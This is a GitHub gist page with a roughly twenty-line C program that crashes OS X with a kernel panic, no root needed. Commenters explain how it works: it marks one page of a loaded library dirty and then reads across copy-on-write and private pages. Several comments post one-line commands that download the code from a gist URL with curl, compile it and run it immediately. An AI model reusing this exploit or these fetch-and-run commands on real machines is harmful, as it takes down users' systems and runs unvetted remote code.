Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Kernel panic in latest OS X in 10 lines of C
#include <unistd.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach-o/dyld.h>
int
main (int argc, char * argv[])
{
volatile char * library;
const mach_vm_size_t page_size = getpagesize ();
const mach_vm_size_t buffer_size = 3 * page_size;
char buffer[buffer_size];
mach_vm_size_t result_size;
library = (char *) _dyld_get_image_header (1);
mach_vm_protect (mach_task_self (), (mach_vm_address_t) (library + page_size), page_size, FALSE, VM_PROT_READ | VM_PROT_WRITE | VM_PROT_COPY | VM_PROT_EXECUTE);
library[page_size]++;
library[page_size]--;
result_size = 0;
mach_vm_read_overwrite (mach_task_self (), (mach_vm_address_t) library, buffer_size, (mach_vm_address_t) buffer, &result_size);
return 0;
}
@sbose78

This comment has been minimized.

Copy link

sbose78 commented Feb 20, 2015

Some code comments would help :(

@evilsocket

This comment has been minimized.

Copy link

evilsocket commented Feb 20, 2015

@sbose78: gets a pointer to the first loaded library, changes the protection of its second memory page, performs some writings on that offset and then tries to read the first 3 pages of the image into a buffer.

@oleavr

This comment has been minimized.

Copy link

oleavr commented Feb 20, 2015

@sbose78 mach_vm_read_overwrite of a mapped range of which the first three pages are [COW][PRV][COW] triggers a kernel panic. Line 17 taints the second page so it changes from COW (Copy-On-Write) to PRV (Private).

@kainz

This comment has been minimized.

Copy link

kainz commented Feb 21, 2015

Does this require root to run?

@jhorowitz

This comment has been minimized.

Copy link

jhorowitz commented Feb 21, 2015

@kainz No

@workmanw

This comment has been minimized.

Copy link

workmanw commented Feb 21, 2015

Wow. That totally works. Without root. Soooo easy:

curl https://gist.githubusercontent.com/anonymous/de6b81c556b5dc7cdc8b/raw/f94865347edc780c5c8490db097648ac50f9b8ba/gistfile1.txt > crash.c && gcc -o crash crash.c && ./crash
@Bilge

This comment has been minimized.

Copy link

Bilge commented Feb 21, 2015

library[page_size]++;
library[page_size]--; 

Am I being trolled?

@bcho

This comment has been minimized.

Copy link

bcho commented Feb 21, 2015

@Bilge No, these two lines are used to make the library dirty. See @oleavr 's comment.

@CoolOppo

This comment has been minimized.

Copy link

CoolOppo commented Feb 21, 2015

panickerPath=`mktemp`
curl https://gist.githubusercontent.com/anonymous/de6b81c556b5dc7cdc8b/raw/f94865347edc780c5c8490db097648ac50f9b8ba/gistfile1.txt | gcc -xc -o $panickerPath -
./$panickerPath

This might work. I tried to improve @workmanw's solution for it to work without writing the C code to a file.

@steakknife

This comment has been minimized.

Copy link

steakknife commented Feb 23, 2015

@CoolOppo With bash:

cc -xc <(curl https://gist.githubusercontent.com/anonymous/de6b81c556b5dc7cdc8b/raw/f94865347edc780c5c8490db097648ac50f9b8ba/gistfile1.txt) && ./a.out
@iskl

This comment has been minimized.

Copy link

iskl commented Apr 5, 2015

The code do works!!! Awesome!!! Fantastic!!! Unreal!!!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.